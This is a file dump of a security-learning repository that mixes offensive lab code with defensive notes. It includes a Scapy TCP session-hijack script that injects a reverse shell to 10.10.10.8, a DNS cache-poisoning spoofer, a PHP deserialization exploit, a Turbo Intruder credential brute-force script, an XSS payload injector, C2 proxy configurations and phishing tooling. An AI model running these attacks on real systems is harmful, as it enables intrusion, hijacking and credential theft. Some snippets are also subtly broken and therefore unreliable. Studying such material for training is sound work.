RUN git clone https://github.com/byt3bl33d3r/SILENTTRINITY/ /root/st/ 16 | WORKDIR /root/st/ 17 | RUN pip install -r requirements.txt 18 | EXPOSE 5000 19 | ENTRYPOINT python st.py teamserver 0.0.0.0 $TS_PASS 20 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/templates/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Template, Attachment 2 | from gophish.api.templates import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class TemplatesMenu: 8 | def __init__(self, client=None): 9 | self.templates_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sTemplates%s) %s " %(fg(self.templates_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 22 | %(fg(self.templates_menu_color),attr(0)) 23 | ) 24 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/router.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | type router struct{} 9 | 10 | // ServeHTTP is a receiver function that needs to be implemented 11 | // for a type that wants to be a ``http.Handler`` 12 | func (r *router) ServeHTTP(rw http.ResponseWriter, req *http.Request) { 13 | switch req.URL.Path { 14 | case "/hello": 15 | fmt.Fprintf(rw, "Hello from /hello") 16 | case "/welcome": 17 | fmt.Fprintf(rw, "welcome from /welcome") 18 | case "/bye": 19 | fmt.Fprintf(rw, "Bye from /bye") 20 | default: 21 | http.Error(rw, "Not found", 404) 22 | } 23 | } 24 | 25 | func main() { 26 | var r router 27 | // Passing in the ``http.Hanlder`` type router 28 | // as second paramter to ```http.ListenAndServer``` 29 | http.ListenAndServe("127.0.0.1:8080", &r) 30 | } 31 | -------------------------------------------------------------------------------- /C2Routing/nginx/msf_c2_rev_proxy.nginx: -------------------------------------------------------------------------------- 1 | # server instance listening on port 8080 2 | server { 3 | listen 443 http2 ssl default_server; 4 | root /var/www/html; 5 | index "index.html"; 6 | server_name "bin3x.com"; 7 | 8 | ssl_certificate "/etc/ssl/certs/nginx-selfsigned.crt"; 9 | ssl_certificate_key "/etc/ssl/private/nginx-selfsigned.key"; 10 | ssl_dhparam "/etc/ssl/certs/dhparam.pem"; 11 | 12 | # try finding the specified path in the 13 | # request URI (part after domain), if not found return 404 14 | location / { 15 | try_files $uri $uri/ =404; 16 | } 17 | 18 | # MSF C2 route 19 | location /msf_endpoint { 20 | proxy_pass "https://localhost:8443"; 21 | proxy_ssl_verify off; 22 | proxy_set_header Host $host; 23 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /IntegrationDeliveryDeployment/top-10-cicd-security-risks/README.md: -------------------------------------------------------------------------------- 1 | # Top 10 CI/CD Security Risks 2 | 3 | ### Insufficient Flow Control Mechanisms 4 | 5 | ### Inadequate Identity and Access Management 6 | 7 | ### Dependency Chain Abuse 8 | 9 | ### Poisoned Pipeline Execution (PPE) 10 | 11 | ### Insufficient Pipeline-Based Access Controls (PBAC) 12 | 13 | ### Insufficient Credential Hygiene 14 | 15 | ### Insecure System Configuration 16 | 17 | ### Ungoverned Usage of 3rd Party Services 18 | 19 | ### Improper Artifact Intregrity Validation 20 | 21 | ### Insufficient Logging and Visiblity 22 | 23 | #### Resources 24 | 25 | - [Cider Security CI/CD Security Risks](https://www.cidersecurity.io/top-10-cicd-security-risks/) 26 | - [OWASP DevSlop Top 10 CI/CD Security Risks YouTube Talk](https://www.youtube.com/watch?v=i1SO8AH4AxI) 27 | -------------------------------------------------------------------------------- /SecureCodeReview/go/xss/basic_xss_validation.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | // localhost:8081/?arg1= 4 | 5 | import ( 6 | "fmt" 7 | "net/http" 8 | "text/template" 9 | ) 10 | 11 | func handler(w http.ResponseWriter, r *http.Request) { 12 | arg1 := r.URL.Query().Get("arg1") 13 | 14 | tmpl, err := template.New("params").Parse( 15 | `{{ define "home" }} 16 | {{ . }} 17 | {{ end }}`, 18 | ) 19 | if err != nil { 20 | fmt.Printf("%s\n", err.Error()) 21 | } 22 | tmpl.ExecuteTemplate(w, "home", arg1) 23 | } 24 | 25 | func main() { 26 | http.HandleFunc("/", handler) 27 | fmt.Println("listening on :8081 ...") 28 | http.ListenAndServe(":8081", nil) 29 | } 30 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/CapabilityLeakingVulnerableProg.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void main() 6 | { 7 | int fd; 8 | char *v[2]; 9 | 10 | /* 11 | Assume `/etc/xyz` is an important system file, and it 12 | is owned by root with permission 0644. 13 | Before running this program, you should create the file 14 | `/etc/xyz/` first 15 | */ 16 | fd = open("/etc/xyz", O_RDWR | O_APPEND); 17 | if (fd == -1) 18 | { 19 | printf("Cannot open /etc/xyz\n"); 20 | exit(0); 21 | } 22 | 23 | printf(fd is %d\n", fd); 24 | 25 | // permanently disable the privilege by making the 26 | // effective uid the same as the real uid 27 | setuid(getuid()); 28 | 29 | // execute `/bin/bash` 30 | v[0] = "/bin/bash"; v[1] = 0; 31 | execve(v[0], v, 0); 32 | } 33 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/groups/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Group 2 | from gophish.api.groups import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class GroupsMenu(): 8 | def __init__(self, client=None): 9 | self.groups_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sGroups%s) %s " %(fg(self.groups_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 22 | %(fg(self.groups_menu_color),attr(0)) 23 | ) 24 | 25 | def get_groups(): 26 | pass 27 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/attack.php: -------------------------------------------------------------------------------- 1 | username = new ReadFile(); 8 | $this->isAdmin = True; 9 | } 10 | } 11 | 12 | class ReadFile 13 | { 14 | public function __construct() 15 | { 16 | $this->filename = "/etc/passwd"; 17 | $this->pwnobj = new Pwned(); 18 | } 19 | 20 | } 21 | 22 | class LogFile 23 | { 24 | public function __construct() 25 | { 26 | $this->filename = './proof.php'; 27 | $this->username = ''; 28 | } 29 | } 30 | 31 | class Pwned 32 | { 33 | public function __construct() 34 | { 35 | $this->command = 'echo you have been pwned > ./pwn.txt'; 36 | } 37 | } 38 | 39 | $user = new User(); 40 | echo serialize($user) . "\n"; 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/Authentication/account-lockout-username-enum-turbo-intruder.py: -------------------------------------------------------------------------------- 1 | def queueRequests(target, wordlists): 2 | engine = RequestEngine(endpoint=target.endpoint, 3 | concurrentConnections=1, 4 | requestsPerConnection=10, 5 | engine=Engine.BURP2 6 | ) 7 | buffer = [] 8 | chunk_size = 3 9 | for line in open('passwords.txt'): 10 | buffer.append(line.rstrip()) 11 | if len(buffer) == chunk_size: 12 | for username in open('usernames.txt'): 13 | for passwd in buffer: 14 | engine.queue(target.req, [username.rstrip(), passwd]) 15 | buffer = [] 16 | 17 | 18 | def handleResponse(req, interesting): 19 | if interesting: 20 | table.add(req) 21 | -------------------------------------------------------------------------------- /Misc/TCPAttacks/SessionHijacking/session_hijacking.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import * 4 | 5 | def sess_hijack(pkt): 6 | if pkt.haslayer(TCP): 7 | newseq = pkt[TCP].seq + 10 8 | newack = pkt[TCP].ack + 1 9 | ip = IP(src="10.10.10.6", dst="10.10.10.7") 10 | tcp = TCP(sport=pkt[TCP].sport, dport=23, 11 | flags="A", seq=newseq, ack=newack) 12 | 13 | data = "\n/bin/bin -i >/dev/tcp/10.10.10.8/1337 0<&1 2>&1\n" 14 | pkt = ip/tcp/data 15 | send(pkt, verbose=0) 16 | quit() 17 | 18 | if __name__ == "__main__": 19 | print("Initiating session hijacking...") 20 | applied_filter = "tcp and src host 10.10.10.6 " \ 21 | "and dst host 10.10.10.7 " \ 22 | "and dst port 23" 23 | sniff(filter=applied_filter, prn=sess_hijack) 24 | -------------------------------------------------------------------------------- /IncidentResponse/finding_evil.md: -------------------------------------------------------------------------------- 1 | # Finding Malware On A System 2 | 3 | Attempting to identify evil on a compromised system requires a baseline understanding of what is expected and normal behavior from 4 | the system being analyzed. Periodically capturing and storing the state of a system can help aid in incident response triage by informing 5 | us of what normal looks like for the system under analysis. This process may require include gathering information such as running 6 | processes, open ports, running services, etc. 7 | 8 | ### Rogue Connections 9 | 10 | Detecting unusual connections to rogue domain or IP addresses is one way to identify malicious activities on a compromised system. 11 | 12 | ### Unusual Processes 13 | 14 | ### Unusual Ports 15 | 16 | ### Unusual Services 17 | 18 | ### Rogue Accounts 19 | 20 | ### Unusual Files 21 | 22 | ### Autostart Locations 23 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char *passwd) 6 | { 7 | char passwd_buff[16]; 8 | int auth=0; 9 | 10 | strcpy(passwd_buff, passwd); 11 | if(strcmp(passwd_buff, "password!23")==0 || strcmp(passwd_buff, "123456")==0) 12 | auth=1; 13 | return auth; 14 | } 15 | 16 | int main(int argc, char *argv[]) 17 | { 18 | if(argc<2) 19 | { 20 | printf("Usage: %s ", argv[0]); 21 | exit(0); 22 | } 23 | 24 | if(check_auth(argv[1])==1) 25 | { 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=\n"); 27 | printf("\tAccess Granted.\n"); 28 | printf("=-=-=-=-=-=-=-=-=-=-=-=\n"); 29 | } 30 | else 31 | printf("\nAccess Denied.\n"); 32 | 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char *passwd) 6 | { 7 | char passwd_buff[16]; 8 | int auth=0; 9 | 10 | strcpy(passwd_buff, passwd); 11 | if(strcmp(passwd_buff, "password!23")==0 || strcmp(passwd_buff, "123456")==0) 12 | auth=1; 13 | return auth; 14 | } 15 | 16 | int main(int argc, char *argv[]) 17 | { 18 | if(argc<2) 19 | { 20 | printf("Usage: %s ", argv[0]); 21 | exit(0); 22 | } 23 | 24 | if(check_auth(argv[1])==1) 25 | { 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=\n"); 27 | printf("\tAccess Granted.\n"); 28 | printf("=-=-=-=-=-=-=-=-=-=-=-=\n"); 29 | } 30 | else 31 | printf("\nAccess Denied.\n"); 32 | 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/C2Multiplexing/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "log" 5 | "net/http" 6 | "net/http/httputil" 7 | "net/url" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | var ( 13 | hostProxy = make(map[string]string) 14 | proxies = make(map[string]*httputil.ReverseProxy) 15 | ) 16 | 17 | func init() { 18 | hostProxy["attacker1.com"] = "http://192.168.33.128:10080" 19 | hostProxy["attacker2.com"] = "http://192.168.33.128:20080" 20 | 21 | for hostname, u := range hostProxy { 22 | remote, err := url.Parse(u) 23 | if err != nil { 24 | log.Fatal("(main) Unable to parse proxy target") 25 | } 26 | proxies[hostname] = httputil.NewSingleHostReverseProxy(remote) 27 | } 28 | } 29 | 30 | func main() { 31 | r := mux.NewRouter() 32 | for host, proxy := range proxies { 33 | r.Host(host).Handler(proxy) 34 | } 35 | log.Fatal(http.ListenAndServe(":80", r)) 36 | } -------------------------------------------------------------------------------- /Burp/Bambdas/highlightPerHttpMethod.java: -------------------------------------------------------------------------------- 1 | Annotations annotations = requestResponse.annotations(); 2 | HttpRequest request = requestResponse.request(); 3 | String method = request.method(); 4 | 5 | switch (method) { 6 | case "GET": 7 | annotations.setHighlightColor(HighlightColor.GRAY); 8 | break; 9 | case "POST": 10 | annotations.setHighlightColor(HighlightColor.ORANGE); 11 | break; 12 | case "PUT": 13 | annotations.setHighlightColor(HighlightColor.CYAN); 14 | break; 15 | case "PATCH": 16 | annotations.setHighlightColor(HighlightColor.YELLOW); 17 | break; 18 | case "DELETE": 19 | annotations.setHighlightColor(HighlightColor.RED); 20 | break; 21 | case "OPTIONS": 22 | annotations.setHighlightColor(HighlightColor.MAGENTA); 23 | break; 24 | default: 25 | annotations.setHighlightColor(HighlightColor.PINK); 26 | break; 27 | } 28 | 29 | return true; 30 | -------------------------------------------------------------------------------- /DockerStuff/BugBounty/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update && apt upgrade -y && \ 4 | apt install wget tar -y 5 | 6 | RUN go get -v -u github.com/tomnomnom/fff 7 | RUN go get -v -u github.com/tomnomnom/assetfinder 8 | RUN go get -v -u github.com/tomnomnom/gron 9 | RUN go get -v -u github.com/tomnomnom/gf 10 | RUN go get -v -u github.com/tomnomnom/httprobe 11 | RUN go get -v -u github.com/tomnomnom/unfurl 12 | RUN go get -v -u github.com/tomnomnom/anew 13 | RUN go get -v -u github.com/tomnomnom/waybackurls 14 | RUN go get -v -u github.com/OWASP/Amass/v3/... 15 | RUN go get -v -u github.com/ffuf/ffuf 16 | 17 | WORKDIR /tools 18 | RUN wget https://github.com/epi052/feroxbuster/releases/download/v2.3.2/x86_64-linux-feroxbuster.tar.gz && \ 19 | tar xzvf x86_64-linux-feroxbuster.tar.gz && chmod +x feroxbuster && \ 20 | install feroxbuster /usr/local/bin/feroxbuster && rm ./x86_64-linux-feroxbuster.tar.gz 21 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/middleware.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "log" 6 | "net/http" 7 | ) 8 | 9 | type Logger struct { 10 | Inner http.Handler 11 | } 12 | 13 | // ServerHTTP is a wrapper to the Logger.Inner ``http.Handle`` 14 | func (l *Logger) ServeHTTP(w http.ResponseWriter, r *http.Request) { 15 | log.Println("Starting ...") 16 | l.Inner.ServeHTTP(w, r) 17 | log.Println("Ending ...") 18 | } 19 | 20 | // welcome is a callback functions for any request made 21 | // to our server 22 | func welcome(w http.ResponseWriter, r *http.Request) { 23 | fmt.Fprintf(w, "Welcome!\n") 24 | } 25 | 26 | func main() { 27 | // Handler function is return an ``http.Handler`` 28 | f := http.HandlerFunc(welcome) 29 | // Instantiating a new Logger instance and assigning 30 | // the Inner variable to be f 31 | l := Logger{Inner: f} 32 | // Starting server 33 | http.ListenAndServe("127.0.0.1:8080", &l) 34 | } 35 | -------------------------------------------------------------------------------- /Misc/DNSAttacks/local_dns_cache_poisoning.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | # flush DNS cache: ipconfig /flushdns 4 | 5 | def poison_cache(pkt): 6 | """Spoof DNS request to `example.com` and poison local DNS cache""" 7 | if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')): 8 | print("Spoofing DNS reply for DNS query for `example.com`") 9 | ip = IP(src=pkt[IP].dst, dst=pkt[IP].src) 10 | udp = UDP(sport=53, dport=pkt[UDP].sport) 11 | 12 | Annsec = DNSRR( 13 | rrname=pkt[DNS].qd.qname, type='A', 14 | rdata='1.2.3.4', ttl=259200 15 | ) 16 | dns = DNS( 17 | id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, 18 | qr=1, qdcount=1, ancount=1, an=Annsec 19 | ) 20 | 21 | spoofpkt = ip/udp/dns 22 | send(spoofpkt, verbose=0) 23 | 24 | if __name__ == "__main__": 25 | sniff(filter="udp", prn=poison_cache) -------------------------------------------------------------------------------- /Burp/Bambdas/highlightPerHttpMethod.json: -------------------------------------------------------------------------------- 1 | { 2 | "bambda":{ 3 | "http_history_display_filter":{ 4 | "bambda":"Annotations annotations = requestResponse.annotations();\r\nHttpRequest request = requestResponse.request();\r\nString method = request.method();\r\n\r\nswitch (method) {\r\n case \"GET\":\r\n annotations.setHighlightColor(HighlightColor.GRAY);\r\n break;\r\n case \"POST\":\r\n annotations.setHighlightColor(HighlightColor.ORANGE);\r\n break;\r\n case \"PUT\":\r\n annotations.setHighlightColor(HighlightColor.CYAN);\r\n break;\r\n case \"PATCH\":\r\n annotations.setHighlightColor(HighlightColor.YELLOW);\r\n break;\r\n case \"DELETE\":\r\n annotations.setHighlightColor(HighlightColor.RED);\r\n break;\r\n case \"OPTIONS\":\r\n annotations.setHighlightColor(HighlightColor.MAGENTA);\r\n break;\r\n default:\r\n break;\r\n}\r\n\r\nreturn true;\r\n" 5 | } 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /Cryptography/Hashing/generate_wordlist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from sys import argv, exit 3 | 4 | def generate_wordlist(alphabet, max_length): 5 | # base case 6 | if max_length <= 0: return 7 | for c in alphabet: yield c 8 | for c in alphabet: 9 | print(max_length) 10 | # recursion :( 11 | for n in generate_wordlist(alphabet, max_length-1): 12 | print("yield") 13 | yield c + n 14 | 15 | if __name__ == "__main__": 16 | if len(argv) != 3: 17 | print(f"Usage: {__file__} ") 18 | exit(1) 19 | 20 | wordlist_alphabet = argv[1] 21 | wordlist_max_length = int(argv[2]) 22 | wordlist = generate_wordlist(wordlist_alphabet, wordlist_max_length) 23 | [print(word) for word in wordlist] 24 | 25 | with open("word.lst", "w") as f: 26 | [f.write(word+"\n") for word in wordlist] 27 | 28 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/README.md: -------------------------------------------------------------------------------- 1 | # File Canary 2 | 3 | Receive an email whenever a file you intentionally create to lure attackers gets opened. This should be installed as a cronjob (Linux) or scheduled task (Windows). Enjoy! 4 | 5 | ### Usage 6 | 7 | Set the following environment variables: 8 | 9 | - `EMAIL_ADDR` - gmail address 10 | - `EMAIL_PASS` - gmail password (if you are using 2fa authentication, you need to create an app password to authenticate to gmail 11 | 12 | Getting an app password: [app_password](https://www.lifewire.com/get-a-password-to-access-gmail-by-pop-imap-2-1171882) 13 | 14 | ``` 15 | usage: canary.py [-h] FILE 16 | 17 | Basic file canary Python program 18 | 19 | positional arguments: 20 | FILE File to act as canary 21 | 22 | optional arguments: 23 | -h, --help show this help message and exit 24 | ``` 25 | 26 | ### Example 27 | 28 | ``` 29 | python3 canary.py secrets.txt 30 | ``` 31 | -------------------------------------------------------------------------------- /Burp/CustomActions/QueryParamXSSInjection.java: -------------------------------------------------------------------------------- 1 | List modifiedParams = new ArrayList<>(); 2 | requestResponse.request().parameters().forEach((param) -> { 3 | if (param.type() == HttpParameterType.URL) { 4 | logging.logToOutput(String.format("[+] injectiong XSS payload in parameter named: '%s'", param.name())); 5 | HttpParameter p = HttpParameter.urlParameter(param.name(), ""); 6 | modifiedParams.add(p); 7 | } else { 8 | modifiedParams.add(param); 9 | } 10 | }); 11 | 12 | var response = api().http().sendRequest(requestResponse.request().withUpdatedParameters(modifiedParams)).response(); 13 | var body = response.body().toString(); 14 | if (body.contains("onerror=\"alert(") 15 | || body.contains("onerror=alert(")) { 16 | logging.logToOutput("[+] the submitted XSS payload () has been reflected in the response body!"); 17 | } 18 | -------------------------------------------------------------------------------- /Misc/BashCyOps/IncidentResponse/commands_ran_with_sudo.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #IFS=$"\n" 4 | if [[ $EUID != "0" ]] 5 | then 6 | echo "[-] Must run $0 as root..." 7 | exit 1 8 | fi 9 | 10 | printf "%15s\n" "Date" 11 | printf "========================================================================================\n" 12 | 13 | while read LINE 14 | do 15 | [[ -z $LINE ]] && continue 16 | if [[ "$LINE" == *"COMMAND"* ]] && [[ "$LINE" == *"PWD"* ]] 17 | then 18 | DATE=$(echo $LINE | egrep -o '[JFMASONDa-z]{3}\s[0-9]{1,2}\s[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}') 19 | USERNAME=$(echo $LINE | egrep -o 'USER=[A-Za-z0-9]+\s') 20 | # Change the statements above to use parameter expansion for optimization 21 | DIRECTORY=${LINE##*PWD=} && DIRECTORY=${DIRECTORY/ *//} 22 | echo $DATE $USERNAME $DIRECTORY 23 | else 24 | continue 25 | fi 26 | done < /var/log/auth.log 27 | 28 | -------------------------------------------------------------------------------- /OffensiveGo/PortScanner/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "sort" 7 | ) 8 | 9 | func worker(ports, results chan int) { 10 | for p := range ports { 11 | addr := fmt.Sprintf("scanme.nmap.org:%d", p) 12 | conn, err := net.Dial("tcp", addr) 13 | if err != nil { 14 | continue 15 | } 16 | conn.Close() 17 | results <- p 18 | } 19 | } 20 | 21 | func main() { 22 | ports, results := make(chan int, 100), make(chan int) 23 | var openPorts []int 24 | 25 | for i := 0; i < cap(ports); i++ { 26 | go worker(ports, results) 27 | } 28 | 29 | go func() { 30 | for i := 1; i <= 1024; i++ { 31 | ports <- i 32 | } 33 | }() 34 | 35 | for range results { 36 | port := <-results 37 | openPorts = append(openPorts, port) 38 | } 39 | 40 | close(ports) 41 | close(results) 42 | 43 | sort.Ints(openPorts) 44 | for _, port := range openPorts { 45 | fmt.Printf("%d [open]\n", port) 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /SecureCodeReview/secure-code-practices/README.md: -------------------------------------------------------------------------------- 1 | # Secure Coding Best Practices 2 | 3 | - [ ] Input Validation 4 | - sanitize, validate all user-supplied input server-side 5 | - centralize input validation procedures 6 | - conanicalize data before passing it to a validation routine 7 | - data that fails to pass validations should be rejected 8 | - validate all sources of untrusted user inputs such as URLs, URL parameters, HTTP headers, form data 9 | - validate number ranges, date ranges, expected data types 10 | - validate input against trusted allow ("white") list 11 | - [ ] Output Encoding 12 | - [ ] Authentication and Password Management 13 | - [ ] Session Management 14 | - [ ] Access Control 15 | - [ ] Cryptographic Practices 16 | - [ ] Error Handling and Logging 17 | - [ ] Data Protection 18 | - [ ] Communication Security 19 | - [ ] System Configuration 20 | - [ ] Database Security 21 | - [ ] File Management 22 | - [ ] Memory Management 23 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/check_if_ip_local_or_external.zeek: -------------------------------------------------------------------------------- 1 | global local_subnets: set[subnet] = {192.168.1.0/24, 192.68.2.0/24, 172.16.0.0/20, 172.16.16.0/20, 172.16.32.0/20, 172.16.48.0/20}; 2 | global inside_local_network: set[addr]; 3 | global outside_local_network: set[addr]; 4 | 5 | event new_connection(c: connection) 6 | { 7 | if (c$id$orig_h in local_subnets) 8 | { 9 | add inside_local_network[c$id$orig_h]; 10 | } 11 | else 12 | add outside_local_network[c$id$orig_h]; 13 | 14 | if (c$id$resp_h in local_subnets) 15 | { 16 | add inside_local_network[c$id$resp_h]; 17 | } 18 | else 19 | add outside_local_network[c$id$resp_h]; 20 | } 21 | 22 | event zeek_done() 23 | { 24 | print("IP's inside local network"); 25 | for (local_ip in inside_local_network) 26 | { 27 | print(local_ip); 28 | } 29 | print("IP's outside local network"); 30 | for (external_ip in outside_local_network) 31 | { 32 | print(external_ip); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /MyTools/BlueTeam/evtinfo/evtinfo.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/csv" 5 | "fmt" 6 | "os" 7 | ) 8 | 9 | func main() { 10 | if len(os.Args) < 2 { 11 | fmt.Println("usage: eventinfo [event_id] [event_id] ...") 12 | return 13 | } 14 | eventIdArgs := os.Args[1:] 15 | csvFile, err := os.Open("events.csv") 16 | if err != nil { 17 | fmt.Printf("there was an error opening file: %s", err) 18 | return 19 | } 20 | defer csvFile.Close() 21 | reader, err := csv.NewReader(csvFile).ReadAll() 22 | if err != nil { 23 | fmt.Printf("an error occured: %s", err) 24 | } 25 | for _, line := range reader { 26 | eventId, description := line[0], line[1] 27 | for _, arg := range eventIdArgs { 28 | if eventId == arg { 29 | fmt.Printf("\u001b[31mEvent ID\u001b[0m: %s\n\u001b[32mDescription\u001b[0m: '%s'\n", eventId, description) 30 | fmt.Println("******************************************************") 31 | } 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Burp/CustomActions/HttpParameterPollutionCheck.java: -------------------------------------------------------------------------------- 1 | List urlParams = requestResponse.request().parameters(HttpParameterType.URL); 2 | HttpRequest request = requestResponse.request(); 3 | 4 | for (HttpParameter p: urlParams) { 5 | String randStr = api().utilities().randomUtils().randomString(12); 6 | String b64String = api().utilities().base64Utils().encodeToString(randStr); 7 | request = request.withAddedParameters(HttpParameter.urlParameter(p.name(), b64String)); 8 | } 9 | 10 | api().http().sendRequest(request); 11 | logging().logToOutput("[+] check response in Logger tab and review for behaviors that indicate the application is vulnerable to parameter polution!!"); 12 | 13 | // observe the submitted request in the Logger tab and see if the application 14 | // processes the first or second parameter. 15 | // Does it validate the first parameter but acts on the second? 16 | // Does it perform the function on both the duplicate parameters? 17 | // etc... -------------------------------------------------------------------------------- /CheatSheets/aws-security-best-practices.md: -------------------------------------------------------------------------------- 1 | # AWS Security Best Practices 2 | 3 | ### Disable Default Execution Endpoint for API Gateway when Using Custom Domain 4 | 5 | - most of the time, you are configuring API gateway to work with a custom domain, and leaving the default execute api endpoint enabled may allow attackers to bypass the security configurations you implemented that apply to requests to your custom domain and not the default api execute api endpoint. 6 | - this also ensures we are reducing the APIs attack surface 7 | 8 | ```console 9 | aws apigateway update-rest-api --rest-api-id "" \ 10 | --patch-operations "op=replace,path=/disableExecuteApiEndpoint,value='True'" \ 11 | --profile $PROFILE 12 | ``` 13 | 14 | ### High-level Security Best Practices Diagram for Basic Serverless Model 15 | 16 | ![image](https://user-images.githubusercontent.com/44281620/188323412-ff3b3de0-4cc7-42ca-8d3d-dac94a55cbe4.png) 17 | 18 | Reference: https://www.youtube.com/watch?v=nEaAuX4O9TU 19 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/Metasploit/client/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "log" 6 | "os" 7 | "rpc" 8 | ) 9 | 10 | var ( 11 | printf := fmt.Printf 12 | println := fmt.Println 13 | ) 14 | 15 | func main() { 16 | host := os.Getenv("MSFHOST") 17 | user := "msf" 18 | pass := os.Getenv("MSFPASS") 19 | 20 | if host == "" || pass == "" { 21 | log.Fatalln("Missing required environment variables: MSFHOST OR MSFPASS") 22 | } 23 | 24 | msfrpc, err := rpc.New(host, user, pass) 25 | defer msfrpc.Logout() 26 | if err != nil { 27 | log.Panicln(err) 28 | } 29 | 30 | sessions, err := msfrpc.SessionList() 31 | if err != nil { 32 | log.Panicln(err) 33 | } 34 | 35 | println("Metasploit Sessions:") 36 | for _, session := range sessions { 37 | printf("Session Id: %d\n", session.Id) 38 | printf("Session type: %s\n", session.Type) 39 | printf("Session Payload: %s\n", session.Payload) 40 | println("[ -------------------------------------------------- ]") 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/ecb_image_encryption.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from sys import argv, exit 4 | from secrets import token_bytes 5 | 6 | if __name__ == "__main__": 7 | if len(argv) < 3: 8 | print(f"Usage: python3 {__file__} quote.bmp [outfile_name].bmp") 9 | exit(1) 10 | 11 | key = token_bytes(32) 12 | cipher = Cipher(algorithms.AES(key), 13 | modes.ECB(), 14 | backend=default_backend()) 15 | encryptor = cipher.encryptor() 16 | 17 | i_f, o_f = argv[1:3] 18 | with open(i_f, "rb") as reader: 19 | with open(o_f, "wb+") as writer: 20 | data = reader.read() 21 | header, body = data[:54], data[54:] 22 | body += b"\x00" * (16-(len(body)%16)) 23 | encrypted_body = encryptor.update(body) 24 | writer.write(header+encrypted_body) 25 | 26 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/README.md: -------------------------------------------------------------------------------- 1 | # PortSwigger Web Security Academy SQL Injection Lab Solutions 2 | 3 | ### Labs 4 | 5 | - [Lab 1](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab1/README.md): Retrieving Hidden Data 6 | - [Lab 2](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab2/README.md): Subverting Application Logic 7 | - [Lab 3](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab3/README.md): Union Attacks > Determining the Number of Columns 8 | - [Lab 4](https://github.com/bin3xish477/cyber-security/blob/master/PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab4/README.md): Union Attacks > Finding a Column Containing Text 9 | - Lab 5: 10 | - Lab 6: 11 | - Lab 7: 12 | - Lab 8: 13 | - Lab 9: 14 | - Lab 10: 15 | - Lab 11: 16 | - Lab 12: 17 | - Lab 13: 18 | - Lab 14: 19 | - Lab 15: 20 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/nginx/Dockerfile: -------------------------------------------------------------------------------- 1 | ####################################### 2 | # build with: 3 | # docker build -t nginx-c2-proxy . 4 | ####################################### 5 